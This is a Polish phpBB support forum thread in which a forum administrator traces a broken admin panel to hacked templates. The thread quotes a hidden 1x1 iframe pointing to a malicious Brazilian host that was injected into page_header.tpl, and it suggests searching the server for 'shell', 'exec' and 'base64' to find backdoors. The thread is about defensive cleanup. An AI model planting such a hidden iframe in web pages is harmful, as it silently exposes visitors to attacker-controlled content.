phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

FAQFAQ - PIERWSZA POMOC!!  regulaminREGULAMIN  SzukajSZUKAJ  UżytkownicyUżytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj  DownloadDownload  katalog Forów DyskusyjnychKatalog Forów   FAQ Video tutoriale

Poprzedni temat «» Następny temat
Nie działa PA - podmienione coś w kodzie strony
Autor Wiadomość
The End


Posty: 49
Wysłany: 13-04-2015, 20:23   Nie działa PA - podmienione coś w kodzie strony

Witam,

Panowie gdzie/ w jakich plikach szukać "lewych" kodów w plikach na FTP, bo jak próbuję się logować do PA to nie ładuje się strona tj. ładuje się tylko pusta strona - białe tło.
Jest też taka ciekawostka, że podczas próby logowania do PA przez sekundę pojawia się w pasku adres: 99novas.com.br
Przeszukałem pliki index ale tam nic nie ma
 
     
Gadatliwa Kasia 

   
Tommekk80



Pomógł: 1411 razy
Posty: 4780
Wysłany: 13-04-2015, 20:26   

The End, sprawdź overall_header i footer oraz bannery w stopce/nagłówku. Jak nie możesz przez PA to w bazie, tabela config.
 
     
The End


Posty: 49
Wysłany: 14-04-2015, 13:57   

Witam, niestety nic w tych plikach nie ma... Gdzie to może jeszcze być?
 
     
irekk


Pomógł: 283 razy
Posty: 2927
Wysłany: 14-04-2015, 18:47   

http://www.forum.elportal.pl/check_files.php te pliki świadomie zmienione?
_________________
Cygantura
 
     
The End


Posty: 49
Wysłany: 14-04-2015, 21:07   

Witam,

Tak wertując pliki w katalogu forum znalazłemi iframe:

Kod:
<iframe src="http://99novas.com.br/amf/index.php?out=1417096020" width="1" height="1" frameborder="0">


W pliku: page_header.tpl

Ale po usunięciu tego iframe nadal jest coś nie tak, bo dalej widzę przekierowanie na pustą stronę.

Dodano:

kolejny plik z iframe to: index_frameset.tpl
Ostatnio zmieniony przez The End 16-04-2015, 20:55, w całości zmieniany 1 raz  
 
     
irekk


Pomógł: 283 razy
Posty: 2927
Wysłany: 14-04-2015, 21:18   

Wyszukaj czy na serwerze nie masz plików zawierających fraz shell, exec, base64. Z reguły tak się ukrywa skrypty dające możliwość zdalnego przejęcia serwisu. Ewentualnie poproś administratora. Możesz ewentualnie wgrać wszystko na świeżo.
_________________
Cygantura
 
     
The End


Posty: 49
Wysłany: 14-04-2015, 21:31   

Udało mi się uruchomić PA po usunięciu tego ostatniego iframe.

Na razie wszystko działa jak należy.

Poszukam plików, nie wiem skąd te ataki i pliki o których wspominasz, gdzie ich szukać?
 
     
irekk


Pomógł: 283 razy
Posty: 2927
Wysłany: 14-04-2015, 22:15   

Na serwerze trzeba puścić grepa, ewentualnie może w cpanelu/plesku/czy co tam masz, jest opcja wyszukania plików po treści.
_________________
Cygantura
 
     
Gadatliwa Kasia 

   
The End


Posty: 49
Wysłany: 14-04-2015, 22:18   

Ok, dziękuje. Dam znać adminowi serwera, bo ja administruję tylko to forum.
 
     
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!

Powered by phpBB modified by Przemo © 2003 phpBB
Strona wygenerowana w 0,06 sekundy. Zapytań do SQL: 13
Polecane serwisy

Najlepsze oprogramowanie do prowadzenia sklepu internetowegoNajlepszy program do sklepu firmowany przez Przem'a

Sklep z gadżetami

serwis laptopów

phpbb

Polisy Ubezpieczeniowe TU Europa

Design Cart - Tworzenie sklepu internetowego

dnirozwoju.pl

Ranking Hostingów HostingOnline.pl

• Zamów reklamę